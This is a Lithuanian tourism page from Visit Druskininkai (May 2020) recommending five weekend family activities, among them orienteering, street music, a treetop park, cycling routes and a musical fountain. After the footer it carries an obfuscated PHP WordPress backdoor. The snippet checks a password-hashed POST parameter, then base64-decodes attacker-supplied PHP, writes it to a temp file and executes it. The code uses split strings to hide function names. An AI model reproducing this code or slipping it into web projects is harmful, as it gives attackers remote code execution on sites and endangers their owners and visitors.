fbpx
A A
A A

Atrask Druskininkus naujai – savaitgalio TOP 5 (05.15-17)

2020.05.19

Pavasaris Druskininkuose svaigina! Šį savaitgalį kurortas ir vėl lauks svečių, paruošęs įvairiausių staigmenų. Juk visas gegužės 15-17 d. savaitgalis skirtas ypatingai progai – Tarptautinei šeimos dienai. Ta proga miestas parengė visą puokštę pramogų šeimoms. Jūsų dėmesiui – TOP 5 ateinančio savaitgalio „perliukai“ Druskininkuose, kuriuos gali patirti jau šį savaitgalį.

UNIKALAUS FORMATO ŠEIMŲ ORIENTACINĖS

Šeimos orientacinės

Atverdami duris svečiams, Druskininkai ieško ir siūlo galimybių savaitgalį kurorte praleisti aktyviai, linksmai ir gerokai įdomiau nei namuose. Juk visiems iki gyvo kaulo pabodo sėdėjimas kambaryje, virtualūs pokalbiai ir ekskursijos iki balkono arba retkarčiais – į prekybos centrą. Tad kitą savaitgalį, kai pasaulyje bus minima Šeimos diena, visas dėmesys kurorte bus skiriamas būtent atvykusioms šeimoms.

Šeimos dieną siūloma praleisti saugiai ir aktyviai, dalyvaujant pažintinėse šeimų orientacinėse varžybose po Druskininkus. Norinčios dalyvauti šeimų komandos pirmiausia turės užsiregistruoti, nes unikalus varžybų formatas užtikrins, kad būtų laikomasi visų karantino reikalavimų, o dalyviai nesibūriuotų. Komandos startuos iš bet kurios Druskininkų vietos pasirinktu laiku: visos atskirai, iš ten, kur patogu.

Paskubėkite registruoti savo šeimos komandą – bit.ly/seimu-orientacines

Kitas

MUZIKA NETIKĖTOSE KURORTO ERDVĖSE

Muzika Druskininkuose

Nors Druskininkai, svetingai atvėrę duris kurorto svečiams, dar negali jų pakviesti į koncertus ar kitus renginius, jie gali pasiūlyti kitų būdų čia besilankantiems kurti geras emocijas ir nuotaiką. Ir vėl šį savaitgalį Druskininkuose skambės muzika ir dainos: nuo švelnios, meilę žadinančios natos iki šėlti kviečiančių ritmų. Justinas Lapatinskas, Anatolijus, Tomas SAX, Robertas Semeniukas ir Viltė, akordeoną virkdantis Aidas įsikurs netikėtose kurorto vietose. O unikali scena ant ratų – Muzikuojantis autobusiukas tęs savo keliones po Druskininkų parkus, važiuos pėsčiųjų gatvėmis, suks ratus aplink Druskonį – muzika pati suras jus ir paskleis gerą nuotaiką. Juk pagaliau – pavasaris!

Kitas

SKRIEK TARP MEDŽIŲ VIRŠŪNIŲ „UNO“ PARKE

SKRIEK TARP MEDŽIŲ VIRŠŪNIŲ UNO PARKE

Pačiame Druskininkų centre, Nemuno pakrantėje įsikūręs ir vėl duris į medžių viršūnes atvėręs „UNO Parks“ siūlo jums aštrių įspūdžių kupiną kelionę gamtos prieglobstyje. Čia saugumas – didžiausias prioritetas, o parke visada galima rasti siurprizų, netikėtumų ir gerų emocijų visai šeimai. Karantino laikotarpis rodo, kad svarbi yra laisvė gyventi klausant savo širdies, sekant savo vidinį vaiką, augti ne tik įveikiant kliūtis, bet ir priimant tai, kas stipriau už mus. Laikas pasitikėti pasauliu aplink ir įveikti save medžių viršūnėse.

Daugiau informacijos – www.unoparks.lt

Parko taisyklės karantino metu

Kitas

DVIRAČIAIS PO DRUSKININKUS:

NUO GĖLIŲ VANDENYNO IKI LEGENDOMIS APIPINTŲ SLĖNIŲ

Dviračiais po Druskininkus

Tų, kurie mėgsta vaikščioti pėsčiomis ar ekologiško transporto – dviračių, paspirtukų, riedžių, vienračių – propaguotojų laukia maršrutai po gražiausias kurorto vietas. Palikite automobilį vienoje iš nemokamų stovėjimo aikštelių ir atraskite Druskininkus saugiai. Dviračiais (paspirtukais, velomobiliais, riedžiais, segvėjais, vienračiais) galima apvažiuoti miesto centrą, Nemuno pakrantę, Vijūnėlės parką, Vilniaus alėją – takai visur dengti asfaltu, alėjos – trinkelėmis. Kvapą užgniauš Druskininkų gėlynai – nors Narcizų šventę šiais metais teko pamiršti, miestas paskendęs įspūdingame žydinčių gėlių vandenyne, kuriuo pasigrožėti gali jau dabar.

Norintys tęsti kelionę po Druskininkų apylinkes gali rinktis „Žvaigždžių orbitos“, „Žilvino tako“, „Nemuno tako“, „Saulės tako“ dviračių maršrutus, šiaurietiškojo pasivaikščiojimo takus. Meilės salos panorama, unikalus Švendubrės gatvinis kaimas su Velnio akmeniu, legendomis apipintas ir M. K. Čiurlionio pamėgtas Raigardo slėnis… Nepamirštami reginiai ir atradimai laukia tavęs.

Druskininkų dviračių takų maršrutai
Dviračių takai 2020
Dviračių nuoma

Kitas

GRAŽIAUSIAS LIETUVOJE MUZIKINIS FONTANAS

Gražiausias Lietuvoje fontanas

Gražiausias Lietuvoje muzikinis fontanas užburs muzikos, čiurlenimo, šviesų ir žydinčių gėlių fajerija. Pačiame Druskininkų centre, Gydyklų parke jau nuo 2011 metų veikiantis muzikinis fontanas yra viena mėgstamiausių vietinių ir miesto svečių vietų bei bene populiariausia lankytina vieta Druskininkuose. Ir taip, 2019 metais jis pelnė gražiausio Lietuvos fontano titulą.

Tai populiari pasimatymų vieta, o kiekvienas norintis trumpąja SMS žinute gali užsakyti savo mėgstamą melodiją, pasirinkdamas ją iš ilgo suprogramuotų fontano melodijų sąrašo.

Kur kitur geriau paskirti pasimatymą atsiveriančiam pasauliui jei ne Druskininkuose?

Ir žinoma tai tik dalis to, ką siūlo Druskininkų kurortas. Savaitgalį atrask Druskininkus naujai. Papasakok apie savo #Top5Druskininkai, rašyk info@druskininkai.lt ar Facebook‘e.

Visit Druskininkai
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}